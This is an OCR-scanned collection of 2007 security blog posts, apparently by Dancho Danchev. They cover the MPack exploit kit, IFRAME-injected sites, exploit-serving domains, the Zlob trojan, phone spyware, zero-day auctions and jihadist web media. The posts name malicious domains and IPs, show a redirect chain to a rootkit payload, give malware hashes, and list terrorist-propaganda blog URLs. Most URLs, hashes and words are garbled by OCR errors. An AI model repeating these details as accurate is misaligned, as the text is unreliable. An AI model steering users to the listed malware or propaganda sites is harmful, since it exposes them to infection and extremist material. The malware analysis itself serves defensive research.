gang bangdemolition.com/us/? id = 15682 
gothnymphs.com/7id = 15682 
kin kythighs.com/7id = 15 682 
porndivinity.com/7id = 15682 



newhentai.com/us/index.html? &id = 15682 

kumtomi.com/index.html? &id = 15682 

Situational awareness at its best is what truly matter at the 
bottom line. 

1. http://it.slashdot.or g /it/Q7/Q6/19/Q215244.shtml 

2 . 

http://www.scma a azine.com/uk/news/article/665192/italian- 

i ob-tro i an-infectin a -thousands-servers/ 
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3. httP://blo a s.zdnet.com/securit v/? p = 3Q8 

4. 

http://blo as. pandasoftware.com/blo a s/ima a es/PandaLabs/20 
07/05/11/M Pack, pdf 

5. 

http://blo a .wired.com/27bstroke6/2QQ7/Q6/new_web exploit 
■ html 

6. http://ddanchev.blo as pot.com/2QQ7/05/webattacker-in- 
action.html 

7. http://ddanchev.blo as pot.com/2QQ6/Q9/cvber- 
intelli a ence-cvberint.html 

8. http://webnews.html.it/news/le aa i/6229/server-aruba- 
sotto-attacco-allarme-in-italia/ 

9. http://alexsandra.wordpress.com/2Q07/Q6/17/possibile- 
intrusione-nei-sistemi-aruba/ 


10. http://isc.sans.or g /diarv.htmPstorvid = 2991 









































11 . 

http://www.svmantec.com/enterprise/securitv response/web 
I oa /2007/05/mpack_packed_fu I l_of_badness.html 

12. http://www.websense.com/securitvlabs/alerts/alert. php? 
AlertlD=782 


13. http://blo a .trendmicro.com/another-malware-pulls-an- 
ital ian- i ob/ 

14. http://www.fin i an.com/MCRCblo a .aspx7Entrvld = 1556 

15. http://www.fin i an.com/MCRCblo a .aspx7Entrvld = 1538 

16. http://ddanchev.blo as pot.com/2QQ7/Q3/shots-from- 
malidous-wild-west-sample.html 

17. 

http://blo as. pandasoftware.com/blo as/ pandalabs/archive/2Q 

07/06/19/More-about-Mpack.as px 

18. 

http://www.svmantec.com/enterprise/securitv_response/web 
loa/u pload/2007/06/MPack= 2520l a .html 

19. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

20. http://www.websense.com/securitvlabs/alerts/alert. php? 
AlertlD=782 
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MANPADS and Terrorism (2007-06-21 00:56) 

















































Can terrorist entities easily obtain shoulder-launched 
surface-to-air missiles and how are they achieving it? How is 

[l]sensitive military technology leaking into the hands of 
those supposedly not in a position to take down modern 

aircraft? Did the overall shift of discussion aiming to shred 
more light into the guerilla type of asymmetric dominance 
terrorists have, excluded the real discussion of how 
MANPADS and [2]night vision equipped fighters take lifes on 
a 

daily basis in the very sense of conventional warfare? 

FAS analyst Matt Schroeder tries to answer these questions 
in a recently released publication entitled "[3]Global efforts 
to control MANPADS" : 

" Preventing the acquisition and use of man-portable air 
defence systems (MANPADS) by terrorists and 
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rebel groups has been a matter of concern since the early 
1970s. However, despite the persistence of the threat 
MANPADS pose to aviation, it was the 2002 al-Qaeda attack 
on an Israeli civilian aircraft flying out of Mombassa, Kenya, 
that focused world attention on the issue. This introductory 
section continues by providing some basic information on 
the development and main types of MANPADS and their 
capabilities. Section II of this appendix gives an overview of 
the main threats posed by the weapon. Section III reviews 
efforts to control the weapon prior to the Mombassa attack, 
and section IV examines contemporary counter-MANPADS 
efforts. Section V presents some concluding observations 


and recommendations for further action. " 

Export controls, stockpile destruction, physical security and 
stockpile management practices, buy-back programmes, 

and active defence measures: airports and airliners are 
among the key topics discussed. Here's a related post on the 

topic M [4]Video Shows Somali Insurgent with Sophisticated 
SA-18 Missile" as well. 

Images courtesy of a MANPADS related article in [5]the 
second issue of the Technical Mujahid E-zine. 

1. http://ddanchev.blo as pot.com/2QQ7/Ql/transferrin a- 
sensitive-militarv.html 

2. http://www.sf a ate.com/c a i-bin/article.c ai? 
file=/c/a/2006/Q8/20/MNGK9KLVH41.DTL 

3. 

http://www.fas.or a /asmp/librarv/reports/2QQ7SIPRIYearbooka 

p penl4A.pdf 

4. 

http://www.fas.or a /blo a /ssp/2QQ7/Q6/video_shows_somali_in 

sur a entw. ohp 

5. http://ddanchev.blo as pot.com/2QQ7/Q6/analvsis-of- 
technical-mu i ahid- i ssue-two.html 
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A List of Terrorists' Blogs (2007-06-21 15:20) 

























Following previous posts M [ 1 ] Fu 11 List of Hezbollah's Internet 
Sites", and "[2]Hezbollah's DNS Service Providers from 1998 
to 2006", here's a list of terrorist/jihadists related blogs 
hosted at Wordpress.com, spreading propaganda, 

violent videos, and yes, glorifying terrorism. The raw content 
is fascinating, and the main idea behind this multilingual 
propaganda translations are to wage a "battle of ideas". 

The list and associated analyses : 

01. [3]The Global Islamic Media Front 
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Keywords density : 

you 531 
allah 493 
their 381 
they 312 
them 306 
which 278 
we 269 
his 266 


not 253 


have 251 


02. [4]The Global Islamic Media Front - in German 

Keywords density : 

die 389 
der374 
von 215 
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ist 187 
sie 175 
den 163 
zu 161 
das 143 
dass 136 
es 129 

03. [5]Abusayfullah 

Keywords density: 

he 33 
his 25 


we 25 


they 23 
allah 23 
news 23 
shaykh 17 
people 16 
wa 16 
fighting 14 
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04. [6]Caravan of Martyrs 
Keywords density: 

he 186 
his 147 
not 124 
allah 122 
him 106 
they 104 
them 82 
one 73 


you 69 


their 66 


The following are no longer updated : 

[7] lnshallahshaheed 

[8] Alkarnee 

[9] Truthline 

[10] Moderatesrefuted 

[11] Naseeha 

Here are some more worth going through or crawling : 

[ 12]Jihad Fields are Calling! 

[13]Crusader Watcher 
305 

As always these are just the tip of the iceberg, but yet 
another clear indication of [14]the digitalization of jihad. 

1. http://ddanchev.blo as pot.com/20Q6/12/full-list-of- 
hezbollahs-internet-sites.html 

2. http://ddanchev.blo as pot.com/2006/Q9/hezbollahs-dns- 
service-providers-from.html 

3. http:// a imf.wordpress.com/ 

4. http:// a imfl.wordpress.com/ 

5. http://abusavfullaah.wordpress.com/ 

6. http://caravanofmartvrs.wordpress.com/ 



















7. http://inshallahshaheed.wordpress.com/ 

8. http://alkarnee.wordpress.com/ 

9. http://truthline.wordpress.com/ 

10. http://moderatesrefuted.wordpress.com/ 

11. http://naseeha.wordpress.com/ 

12. http://mu i ahidfisabeelillah.wordpress.com/ 

13. http://www.crusaderwatcher.blo as pot.com/ 

14. http://mu i ahidfisabeeiillah.wordpress.com/ i ihad- 
wall pa oers/ 
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A Blacklist of Chinese Spammers (2007-06-22 14:15) 

With China no longer feeling pround of its position in the 
top 3 main sources of spam on a worldwide basis, the 

coutry is going a step beyond the [l]bureaucratic measure 
to fight spam by licensing email servers undertaken back 

in April, 2006, and has recently launched [2]a blacklist of 
Chinese spammers : 

" The comprehensive anti-spam processing platform 
([3]http://www. iscbl.anti-spam.cn/) will post a regularly 
updated blacklist of spam servers, allowing telecom 
operators and mail service providers to access the 
information. Over 























100,000 IP addresses have been blacklisted thanks to 
public reports, said Zhao Zhiguo, vice-director of the 
telecom-munications department of the [4] Ministry of 
Information Industry. A "white list" of mail service providers 
will also be posted on the website, boosting the 
development of lawful mail service providers, such as the 
country's big players Sina, 163 and Sohu. ISC Secretary- 
General Huang Chengqing said the website will gradually 
open to the public and 

businesses to accelerate anti-spam efforts domestically and 
internationally " 

And [5]despite that major [6]blacklist providers [7]have 
been providing [8]such lists for years, [9]China's inside- 

towards-outside approach is a great example on the most 
effective, yet not so popular approach of dedicating more 

efforts into filtering outgoing spam, compared to the current 
approach of filtering incoming one. Only if responsibility is 
forwarded to [10]the ISPs doing nothing to filter outgoing 
spam - who will later on offer you a free spam protection to 
differentiate their USP - we can start seeing results. 7h3 r3 
$t i $ a cat and mouse game, and overall decline in the 
confidence and reliability of email communications. 

World spamming map courtesy of Postini. 

1. http://ddanchev.blo as pot.com/2QQ6/Q4/fi a htin a- 
internets-email- i unk-throu a h.html 

2 . 

http://en a lish.people.com.cn/2QQ7Q6/19/en a 2007Q619 385 
489.html 


3. http://www.iscbl.anti-spam.cn/ 
















4. 

http://en a lish.peopledailv.com.en/data/or a ans/statecouncil.s 

html#inf 

5. 

http://www.pro i ecthone v pot.or a /bsh_X19tb2RIPWdsb2 l hbCZ 

idHI 5PWNu 
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6 . 

http://www.pro i ecthone v pot.or a /bss_X19tb2RIPWdsb2 l hbCZ 

fX2 l 5PTEmY3RveTl iba.. 

7. 

http://www.pro i ecthone v pot.or a /bsd X19tb2RIPWdsb2 1 hbCZ 
fX2 l 5PTEmY3RveTl iba.. 

8 . 

http://www.spamhater.zoomshare.com/files/Database/spam 

mers06.china.xls 

9. http://iscbl.anti-spam.cn/rbl-declare. php 

10. http://www.spamhaus.Qr a /statistics/networks.lasso 
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The MPack Kit Attack on Video (2007-06-22 15:19) 

Video demonstration of [l]MPack courtesy of Symantec, 
goes through various infected sites and showcases the 

consequences of visiting them : " This video demonstrates 
how a system is compromised by a malicious IFRAME and 






































how the MPack gang has accomplished this on literally 
thousands of websites (mostly Italian) through usage of an 

/FRAME manager tool. " 

[EMBED] 

Meanwhile, dekalab.info is yet another malicious URL 
exploiting MDAC ActiveX code execution (CVE-2006- 

0003) for you to analyze, among the many already patched 
vulnerabilities used in [2]the latest version of Mpack. The 

question remains - how many zero days are currently 
exploited in the wild through the MPack kit? The "best" is 
yet to come, paying attention to the periodical new supply 
of loaders - 58.65.239.180 got last updated Date: Thu, 21 

Jun 2007 22:02:08 GMT - indicates commitment. 

Input URL: dekalab.info 

Responding IP: 203.121.78.127 

203.121.64.0 - 203.121.127.255 
TIME Telecommunications Sdn Bhd 

Interesting enough, the original source of the IFRAME attack 
58.65.239.180 remains active, still acting as a redirector 
to 64.62.137.149/ edit/ which is again an exploit 
embedded page generated with the MPack kit: 

- 58.65.239.180 

58.65.232.0 - 58.65.239.255 
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HostFresh 


- alpha.nyy-web.com (64.62.137.149) 

64.62.128.0 - 64.62.255.255 
Hurricane Electric 

[3]Evasive malware embedded attacks are aiming the 
improve their chances of not getting detected. If your 
browser 

cannot be exploited all you will see at these IPs/URLs is a :[ 
sign, the rest is the obfuscated javascript attack you can see 
in the screenshot. Here's the deobfuscated reality as well. 
Periodically monitoring these IPs will result in a great deal of 
undetected malware variants. AVs detecting the current 
payload 

eTrust-Vet - [4]Win32/Chepvil!generic 
File size: 7283 bytes 

MD5: ae4e60d99ecl98c805abdf29e735fla7 

SHA1: b0dlb68460683d98302636abl6a0eaa4b579397d 

[5]Aruba.it's comments on the case as well. Now, let's move 
on, shall we? 

1. http://tailrank.com/2137563/MPack-Packed-Full-of- 
Badness 

2. http://ddanchev.blo as pot.com/2007/Q6/massive- 
embedded-web-attack-m- ital v.html 








3. 

http://www.cs. i hu.edu/%7Emoheeb/web paa e fiIes/RAIDO6- 
final.pdf 

4. 

http://www.ca.com/us/securitvadvisor/virusinfo/virus.aspx? 
id = 61203 

5. http://communitv.aruba.it/forums/ultimatebb. php? 
ubb= a et_topic : f=58 : t=000218 
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Cell Phone Stalking (2007-06-25 14:54) 

Six year olds [l]install hardware keyloggers at the U.K's 
Parliament, and now as you can listen to the sweet 
sixteen's voice in this video, they also know how to take 
advantage of [2]commercially available cell phone snooping 
services 

such as [3]Flexispy for instance : 

11 Just ask Tim Kuykendall, whose cell phone provided a 
portal through which a hacker gained access to the most 
inti-mate details of his life, recording family members' 
conversations and snapping pictures of what they were 
wearing. 

"We've had [times] where I'm having a conversation in my 
home and I get a voice mail and the conversation's 
replayed; received a phone call or even checked my voice 
mail from a message and while I push 'OK' to listen to [it] 
I'm hearing a conversation going on in the living room 
between my daughter and my wife," he told FOX News. 11 
















The successful surveillance however, doesn't make him a 
hacker, rather a customer of a product, but what's worth 

considering is how did he manage to infect their cell phones 
at the first place, namely socially engineering them 

remotely, or physically infecting the mobile device. 
Meanwhile, Flexispy is continuing its [4]compatibility efforts 

among popular Symbian, Symbian 9, Windows Mobile, and 
BlackBerry devices, aiming to strengthen its position as 

mobile device activity monitoring solution for some, and cell 
phone stalking service to others - two-sided copywriting 
messages aim to convince those who might be eventually 
opposed to the idea. 

Related posts: 

[5] USB Surveillance Sticks 

[6] Outsourcing the Spying on Your Wife 

1. http://ddanchev.blo as oot.com/2QQ7/Q3/ a hosts-in- 
kevboard.html 

2. http://www.foxnews.eom/storv/Q . 2933 . 286440 . 00.html 

3. http://www.f1exis p v.com/s py phone-remote-listenin a- 
s vmbian.htm 

4. http://www.flexis p v.com/checkphones. isp 

5. http://ddanchev.blo as pot.com/20Q7/Q3/usb-surveillance- 
sticks.html 

6. http://ddanchev.blo as pot.com/2QQ7/Q4/outsourcin a- 
spvina -on-vour-wife.html 
























Security Comic Strips (2007-06-25 15:40) 

[1] 

If all rest is a commodity but attitude, let me introduce you 
to the first two additions from my new [2]Unstripped 

Security comic strips series to be expanded on a weekly 
basis. Strip One - [3]The Blackberry Espionage Saga 
presenting the irony in the International Intelligence 
Community, and Strip Two - [4]It's All a Matter of Perspective 
discussing the different perspectives of commonly 
stereotyped participants during a malicious Internet attack. 
Feel free to email 

and embed them within your thoughts, blogs and sites, 
include a backlink to [5]Unstripped Security, and subscribe 
to 

the [6]RSS feed to get notified on the latest strips. Enjoy! 

1 . 

http://static.stri Da enerator.eom/ a enerated/ddanchev/strip/2 

007/06/24/its-all-a-matter-of-perspective. pna 

2. http://ddanchev.stri pa enerator.com/ 

3. http://ddanchev.stri pa enerator.com/2QQ7/Q6/22/the- 
blackberrv-espiona a e-sa a a.html 

4. http://ddanchev.stri pg enerator.com/2QQ7/06/24/its-all-a- 
matter-of-perspective.html 


5. http://ddanchev.stri pa enerator.com/ 























6. http://ddanchev.stri pa enerator.com/feed/ 
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Early Warning Security Event Systems (2007-06-26 
20:16) 

Years ago, early warning systems for security events used to 
be a proprietary service available to a vendor's 

customers only, or even worse, to the vendors themselves. 
But with more vendors realizing the marketing potential 

behind viral marketing, and the need for more transparency 
on the state of Internet attacks, nowadays such 

EWS's are either publicly available at a vendor's site, or 
accessible due to the emerging CERT-ization and aggre¬ 
gation of honeypot data on a coutry level courtesy of the 
local CERTs themselves. And such is the case with [1]ARAKIS 


11 an early warning system operated by CERT Polska. ARAKI5 
aggregates and correlates data from various sources, 
including honey pots, darknets, firewalls and antivirus 
systems in order to detect new threats. The dashboard 
provides a snapshot of activity on the Internet based on 
data gathered from a selected group of sensors. 11 

PING sweeps dominate the local threatscape? As always, 
nobody likes shooting into the dark unless of course 

they really have to. Several more publicly available early 
warning systems for security events worth considering are : 




[2] ATLAS: Active Threat Level Analysis System 

[3] CipherTrust's Real-Time PC Zombie Statistics 

[4] WatchGuard's Real-Time Spam Outbreak Monitor 

[5] ProjectHoneypot's Spam Harvesting Statistics 

as well as several malware outbreaks related early warning 
systems:[6] 

[7]Trend Micro's Virus Map[8] 

F-Secure's World Map[9] 

PandaSoftware's Virus Map[10] 

McAfee's Virus Map 

As far as any other non IT security incident on a worldwide 
scale is concerned, the [ 11 ]Global Map of Security and 

Terrorist Events, maps the "big picture". The syndication of 
such publicly available data into [12]a central dashboard is 
nothing new, [13]but with so many [14]CERTs in Europe the 
next big milestone to be achived should be to first 

integrate the data between themselves, share with vendors 
and vice versa, and then communicate the big picture 
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for industry insiders and outsiders to see. An effort which 
could really undermine the commercial EW systems, ones 
whose business model is getting outdated with every day. 


The FBI's recent "[15]Operation Bot Roast" not only reminds 
me of [16]the Wardriving Police who will wardrive and leave 



you flyers that [17]you're vulnerable, but also that when 
proactive measures cannot take place post-event ones 

dominate - "Dude, you're malware-infected and sending 
spam and phishing emails to yourself!" - not exactly what 
pragmatic is all about: 

" OPERATION BOT ROAST is a national initiative and ongoing 
investigations have identified over 1 million vic¬ 
tim computer IP addresses. The FBI is working with our 
industry partners, including the CERT Coordination Center 
at 

Carnegie Mellon University, to notify the victim owners of 
the computers. " 

One thing I've learnt about end users, either [18]educate 
and evaluate the results, or directly enforce prac¬ 
tices leaving them with no other option but to stay secure 
by default. Most importantly, with major U.S based 

[19]ISPs sending out spam, thus having the largest 
proportion of infected customers are publicly known. So 
instead 

of giving out anti virus tips, cooperate with ISPs on the 
concept of filtering outgoing spam messages, and DDoS 
attacks. 

With [20]malicious economies of scale, that is botnet 
masters [21]automating the entire [22]process of ex¬ 
ploiting unpatched PCs, using [23]old-school social 
engineering attacks taking advantages of opened up "event 



windows", [24]packing and crypting their malware to exploit 
the flows in the current signatures-based detection 

hype - is such an initiative really worth it? Time will show, 
but what could follow are fake FBI emails telling everyone 
that they're infected, a little something about the operation 
itself, and how visiting a certain [25]malware embedded 

web site will disinfect your PC the way [26]we've seen it 
happen before. 

1. http://arakis.cert.pl/en/index.html 

2. http://atlas.arbor.net/ 

3. http://ddanchev.blo as pot.com/2QQ6/06/real-time-PC- 
zombie-statistics.html 

4. http://ddanchev.blo as pot.com/2QQ6/lQ/real-time-spam- 
outbreak-statistics.html 

5. http://ddanchev.blo as pot.com/2QQ6/Q9/email-spam- 
harvestin a -statistics.html 

6. http://www.trendmicro.com/ma p/ 

7. http://www.trendmicro.com/ma p/ 

8. http://worldmap.f-secure.com/ 

9. http://www.pandasoftware.com/virus_info/map/map.htm 

10. http://www.mcafee.com/anti-virus/virusmap.as p 

11. http://ddanchev.blo as pot.com/2QQ6/ll/ a lobal-map-of- 
securit v inddents-and.html 


12. http://www.certstation.com/ 


































13. 

http://photosl.blo aa er.com/blo aa er/1933/1779/160Q/Euro p 
e CERTs.J pg 

14. 

http://www.enisa.eu.int/doc/pdf/deliverables/enisa_cert_euro 
map vl 2Q6Q21Q.pdf 

15. 

http://www.fbi. a ov/pressrel/pressrel07/botnetQ613Q7.htm 

16. http://ddanchev.blo as pot.com/2QQ6/Q6/wardrivin a- 
police-and-prin a les-hackin a .html 

17. 

http://photQsl.blo aa er.com/blo aa er/1933/1779/1600/wardri 
vina prin a les. pna 

18. http://securitv.isu.edu/pdf/securit v- polic v.pdf 

19. http://www.spamhaus.or a /statistics/networks.lasso 

20. http://ddanchev.blo as pot.com/2QQ7/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

21. http://ddanchev.blo as pot.com/2QQ7/Q5/webattacker-in- 
action.html 


22. http://ddanchev.blo as pot.com/2QQ7/Q6/mpack-kit- 
attack-on-video.html 


23. http://ddanchev.blo as pot.com/2QQ7/Ql/social- 
en a ineerin a -and-malware.html 


24. http://ddanchev.blo as pot.com/2QQ7/Q6/div-malware- 
drop pers-in-wild.html 






















































25. httD://ddanchev.blo as DOt.com/2QQ7/Q6/massive- 
embedded-web-attack-in-italv.html 
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26. httD://news.bbc.co.uk/l/hi/technolo a v/4466Q16.stm 
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Exploits Serving Domains (2007-06-27 11:48) 

More cyber leads from the previous [l]analysis of Mpack 
embedded [2]dekalab.info with a particular [3]malicious 

domains farm emphasis as follows. Multiple redirectors, 
blackhat SEO, XOR-ifying javascript obfuscation and a piece 

of rootkit installed, pretty much everything's in place as 
usual. The majority of redirectors are part of an [4]exploit 
serving domains farm. The whole process starts from 

trancer.biz : 

trancer.biz/sys/index.php 

81.95.149.176 

316 


£ 


HTTP/1.1 302 Found 

Server: nginx/0.5.17 

Date: Tue, 26 Jun 2007 11:51:30 GMT 

Content-Type: text/html 








Transfer-Encoding: chunked 

Connection: keep-alive 

Location: cawajanga.biz /ts/in.cgi?oscorp 

HTTP/1.1 302 Found 

Server: nginx/0.5.17 

Date: Tue, 26 Jun 2007 11:51:31 GMT 

Content-Type: text/html 

Transfer-Encoding: chunked 

Connection: keep-alive 

Location: blooded.biz /2103/index.php 
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Then we get redirected to blooded.biz's obfuscated payload 

81.95.149.176 in between loading cawajanga.biz/ts/in.cgi? 
oscorp and mobi-info.ru where the deobfuscated XOR- 

ifying javascript leads us to the exact payload location the 
output of which is in the form of Rootkit.Win32.Agent.fb 

File size : 7503 bytes 

MD5 : 09994afdl4bl89697a039937f05f440f 

SHA1 : b9832689aal272f39959087df41ceal3fc283910 


1. http://ddanchev.blo as DOt.com/20Q7/Q6/massive- 
embedded-web-attack-in-italv.html 


2. http://ddanchev.blo as pot.com/2007/Q6/mpack-kit-attack- 
on-video.html 

3. http://209.85.135.104/search?g = cache: Ho- 

OuB5 l SaMJ : www.accessbvremote.com/AccessBvRemote/-i-tra 
ncer.biz&hl=en 


&strip = l 

4. http://209.85.135.104/search?g = cache:Ho- 

OuB5 l SaMJ : www.accessbvremote.com/AccessBvRemote/-i-tra 

ncer.biz&hl=en 


&strip = l 
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Post a Crime Online (2007-06-28 14:01) 

In exactly the same fashion of [lJChicago's Crime Database, 
a community powered site integrating crime reports on 

Google Maps, [2]Postacrime.com aims to empower police 
officers with citizen submitted crimes in progress : 

" POSTACRIME.COM is a free service for anyone to upload 
photo or video content of burglary, theft, vandalism, or 
other criminal acts that have been caught on camera for 
the purpose of identification by the public. Often times Law 
Enforcement is unable to apprehend criminals, even if with 
the best video evidence, because no one is able to 






























identify the criminal caught on camera. POSTACRIME.COM 
hopes to change that. " 

If the site reaches YouTube's popularity by disintermediating 
police forces ongoing intestigative efforts, it could also act 
as an early warning system for the criminals themselves, 
especially to change areas of operation. The site is 

pitching itself as the World's Largest Crime Prevention 
Network, a bold vision despite that I find it as an 
intermediary categorizing user submitted crimes and hoping 
the publicity will help identify and criminal and hopefully 
restore 

the stolen goods - you wish. You cannot prevent crime Web 
2.0 style at least not in this way, you can [3]aggregate 

publicly available crime data and present a (heat) map of a 
certain location based on a specific time for trends 

analysis. 

1. http://www.chica a ocrime.or g/ 

2. http://www.postacrime.com/ 

3. http://www.chica a ocrime.or a /ma p/ 
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Exploits Serving Domains - Part Two (2007-06-29 
16:05) 

The saying goes that there's no such thing as free lunch, so 
let me expand it - there's no such thing as free prOn, 









unless you don't count a malware infection as the price. 
What follows is a demonstration of the Zlob trojan in action 

that occurs though the usual redirectors, and here's a 
related article emphasizing on the [ljIFRAME embedded 
prOn 

sites directing traffic to the redirectors : 

" Right now, we are not sure whether the porn sites 
are compromised to host the IFRAMES, are created 
to do so 

or are being paid to host the IFRAMES," 
acknowledged Trend Micro. The attack probably 
began June 17, the 

company said. Other researchers have continued to dig 
into the Mpack-based attacks and have shared some of 
their findings. Symantec Corp., for instance, asked how 
hackers were able to infect so many sites in such a short 
time and how they could inject the necessary IFRAMES code 
- the malicious code they added to the legitimate sites' 
HTML that redirected visitors to the Mpack server - so 
quickly. " 

Psst - they are hosting the IFRAMES, whether compromised 
or equal revenue sharing among the parties is [2]a ques¬ 
tion of another discussion. The attack is quite widespread in 
the time blogging, check for yourself to get [3]a full listing 
of all the IFRAME-ed prOn sites in question. Let's dissect the 
central hosting locations where all other sites ultimately 
lead to. 


At miss-krista.info - 66.230.171.36 - we have an IFRAME 
pointing us to todaysfreevideo.com/ad/6811214.html 



- 81.0.250.239 - where we are offered to download two prOn 
videos, todaysfreevideo.com/teens/mr-tp01- 

2g2sl/l/moviel.php and 
todaysfreevideo. com/teens/m r-tpOl- 
2g2sl/l/movie2.php, but the actual malware is 

hosted at an internal page at downloadvax.com - 
85.255.118.180 - and while as usual we get a 403 
Forbidden at 

the main index, within to domain the prOn surfer gets 
infected with the Zlob Trojan. 

File size: 70853 bytes 
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MD5: 009ca25402ee7994977f706b96383af0 
SHA1: ab60ecefcf27420a57febd5c8decc5c9f34f0e74 
packers: BINARYRES 

Obviously, unsafe prOn surfing leads to malware transmitted 
diseases, but why exploit serving domains when no 

vulnerabilities get exploited at these URLs? Mainly because 
miss-krista.info is part of the exploits hosting domain 

farm I discussed in part one. 

Related posts: 

[4] Exploits Hosting Domains 

[5] The MPack Kit Attack on Video 



[6] Massive Embedded Web Attack in Italy 

[7] Testing Anti Virus Software Against Packed Malware 

1. http://www.computerworld.com/action/article.do? 
command=viewArticleBasic&articleld = 9025578 

2. http://ddanchev.stri pg enerator.com/2QQ7/Q6/24/its-all-a- 
matter-of-perspective.html 

3. http://www. a oo a le.com/search? 

h I=en&a -www.todavsfreevideo.com/ad 

4. http://ddanchev.blo as pot.com/2007/Q6/exploits-servin a- 
domains.html 

5. http://ddanchev.blo as pot.com/2Q07/Q6/mpack-kit-attack- 
on-video.html 

6. http://ddanchev.blo as pot.com/2Q07/Q6/massive- 
embedded-web-attack-in- ital v.html 

7. http://ddanchev.blo as pot.com/20Q7/01/testin a -anti-virus- 
software-a a ainst.html 
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Mujahideen Harvest Magazine - Issue 41 (2007-07-04 
13:47) 
































Compared to [l]the quarterly released [2]Technical Mujahid 
E-zine, the yearly updated [3]Jihadist Security Enclope- 

dia, or the regularly updated [4]terrorism glorifying blogs, 
the Mujahideen Harvest magazine is released monthly, 

and represents a complete account of mujahideen activities 
in Iraq, featuring successful attacks and coming up with 

top 20 lists of the best explosions. It's latest issue 41 is 45 
pages long, and details the strategies and events related to 
each attack in a daily like journal entry. This magazine 
(Mujahideen Harvest) is 100 % conventional warfare 

achievements related, and from an [5]OPSEC perspective, is 
an indispensable account into each and every attack that 

occurred in between the last and the current issue was 
released from the perspective of the mujahideen militants. 

Some more info on the M [6]publishing house" that's been 
releasing it: 

" The Mujahideen Shura Council is an umbrella organization 
of a number of 
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different Islamic terrorist groups active in Iraq, attacking 
U.S. and coalition forces. For some time, they have been 
issuing monthly printed reports in Arabic about their 
"successes" against U.S. forces. Almost without exception, 
these reports are pure Islamic propaganda and issued to 
rally the terrorists fighting in the Iraqi theater. The statistics 
they provide are usually inflated and frequently used by 
other terrorist groups and once translated, are often cited 


by anti-war, anti-U.S. groups to sway public opinion. For 
their October report, they made it easier to attract Western 
sympathizers. " 

1. http://ddanchev.blo as pot.com/2QQ6/12/analvsis-of- 
technical-mu i ahid-issue-one.html 

2. http://ddanchev.blo as pot.com/2Q07/Q6/analvsis-of- 
technical-mu i ahid-issue-two.html 

3. http://ddanchev.blo as pot.com/2QQ7/05/ iE hadist-securit v- 
encvclopedia.html 

4. http://ddanchev.blo as pot.com/20Q7/Q6/list-of-terrorists- 
blo a s.html 

5. http://en.wikipedia.or a /wiki/Operations securit y 

6. http://www.canadafreepress.com/2QQ6/terrorlll8Q6.htm 
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Hacking the iPhone (2007-07-05 15:35) 

Faster than you can say hacked! In the first days of what can 
be described as yet another case study on mar¬ 
keting buzz generation done by [ 1 ]eviI brand managers, 
DVD Jon is coming up with [2]universal unlocking app for 

the iPhone, the folks at Errata Security join the party by 
announcing [3]several vulnerabilities within the device as 
well : 

" So far, Errata has found three main flaws in the long- 
awaited and much-hyped mobile phone/music/video 




























player/mobile Web/email client device: a heap overflow bug 
in its Safari browser; a potential denial-of-service bug in its 
Bluetooth feature; and a data "seepage" bug that could 
cause seemingly innocuous data to be exposed by chatty 
client applications over a WiFi connection. " 

And here's someone [4]pen-testing the entire device to 
figure out that data is leaking out. On the compatibil¬ 
ity front, this is already [5]proving quite handy, and 
regarding this [6]step-by-step disassembly of the iPhone, a 

factory manager in China is definitely in a good mood today. 
Cartoon courtesy of [7]Caglecartoons. 

1. http://blo a s.business2.com/a o Dle/2QQ7/Q6/this-is-one- 
the.html 

2. http://nanocr.eu/2007/Q7/Q3/iphone-without-att/ 

3. 

http://www.forbes.com/technolo a v/20Q7/Q7/Q3/cx Q7Q3dark 
readin a .html 

4. 

http://www.andrew.cmu.edu/user/xsk/iPhoneSecuritvSettin a 

s.html 

5. http://www-personal.umich.edu/~mressl/webshell/ 
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6. http://www.ifixit.com/Guide/iPhone 

7. http://www.ca a lecartoons.com/ 
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Zero Day Vulnerabilities Auction (2007-07-06 13:43) 

Theory and speculation, both finally materialize - an [l]0bay 
auction for security vulnerabilities was recently launched, 
aiming to reboot the currently not so financially favorable 
for researchers full disclosure model, and hopefully, create a 
win-win-win solution for Wabisabilabi, the vendors and the 
researchers themselves : 

" We decided to set up this portal for selling security 
research because although there are many researchers out 
there who discover vulnerabilities very few of them are able 
or willing to report it to the right people due to the fear of 
being exploited. Recently it was reported that although 
researchers had analyzed a little more than 7,000 publicly 
disclosed vulnerabilities last year, the number of new 
vulnerabilities found in code could be as high as 139,362 
per year. Our 

intention is that the marketplace facility on WSLabi 
will enable security researchers to get a fair price for 
their 

findings and ensure that they will no longer be 
forced to give them away for free or sell them to 
cyber-criminals. " 

As I've been covering the topic of commercializing 
vulnerability research since I've started blogging, and my 
second 

post was related to Obay or "[2]How Realistic is the Market 
for Security Vulnerabilities?" I'll briefly summarize the key 


points and let you deepen your knowledge into the topic by 
going through the previous posts related to buying and 

selling vulnerabilities, even requesting ones on demand - 
which is perhaps [3]the most sound market model in my 

opinion at least in respect to relevance. 

Back in December, 2005, the infamous [4]WMF vulnerability 
got sold for $4000 to be later on injected into popular 

sites, and embedded whereaver possible. The idea behind 
this attack? Take advantage of the window of opportunity 

by the time a patch by Microsoft is released, but instead of 
enjoying the typical advantage coming from full 

disclosure exploit and vulnerabilities sites, the attackers 
went a little further, they also wanted to make sure that 

the vulnerability wouldn't even appear there at the first 
place. And while it later became a commodity, WMF DIY 
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generators got released for the script kiddies to generate 
more noise and the puppet masters to remain safe behind 

a curtain of the click'n'infect kiddie crowd. 

Several months later, hinted by a person whose the perfect 
representation of the phrase "Those who talk know 

nothing, those who don't talk they know" tipped me on [5]a 
zero day shop site - The International Exploits Shop - 


that was using a push-model that is a basic listing of the 
vulnerabilities offered and the associated prices, even 
taking advantage of marketing surveys to figure out the 
median price customers [6]would be willing to pay for a zero 
day 

vulnerability. 

Commercializing vulnerability research the way the 
company is doing it, will inevitably demonstrate [7]the lack 
of 

communication and incentives model between all the 
parties in question. Moreover, if you think that a push-model 

from the researcher compared to a pull one, even on 
demand is better think twice - it isn't. If I'm a vendor, I'd 
request a high profile vulnerability to be found in my 
Internet browser in the next two months and offer a certain 
financial 

incentive for doing so, compared to browsing through 
listings of vulnerabilities in products whose market share is 
near the 1 %. For the computer underground, or an 
information broker, there's no such thing as a zero day 
vulnerability 

because they understand the idea that in times when 
everyone's fuzzing more effectively than the vendors 
themselves, 

or transparency and social networking has never been 
better, a zero day to some is the last month's zero day to 
others. 


Questions remain : 



- how do you verify a vulnerability is really a zero day, when 
infomediaries such as iDefense, Zero Day Initiative or 

